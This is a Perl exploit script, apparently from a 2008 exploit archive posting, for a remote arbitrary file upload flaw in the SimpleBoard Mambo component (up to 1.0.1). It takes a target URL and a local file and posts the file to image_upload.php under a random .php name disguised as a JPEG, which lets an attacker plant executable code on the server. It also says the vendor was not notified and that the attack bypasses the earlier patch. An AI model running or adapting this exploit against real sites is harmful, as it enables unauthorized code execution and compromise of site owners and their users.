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Posted on 29 October 2008

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(99999) . ".php"; # no int() print <<INTRO; - SimpleBoard Mambo Component <= 1.0.1 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discovered on: 20 October 2008 Vendor has not been notified! Note: This exploit is a completely diffrent method then the prior simpleboard vulns. which differs from the one located here: http://milw0rm.com/exploits/1994 Same files vulnerable, But this one works with the patch! in later versions of SimpleBoard they removed the image_upload.php so this wont work. but this works on every image_upload.php version. with the patch in place! A common error for the exploit is if openbase_dir is enabled, then this means the file will not get uploaded due to the dir restrictions. - Peace - irc.rizon.net #sectalk INTRO print " Enter URL(ie: http://site.com/mambo): "; chomp(my $url=<STDIN>); print " Enter File Path(path to local file to upload): "; chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php', Content_Type => 'form-data', Content => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); die "HTTP POST Failed!" unless $re->is_success; if($re->content =~ /open_basedir/) { print "open_basedir restriction enabled. Exploit failed. See php.ini for more details. "; # say() ? get perl510 } else { print "Looks like exploit was successfull! for uploaded file check: " . $url . "/components/com_simpleboard/" . $fname . " "; } exit;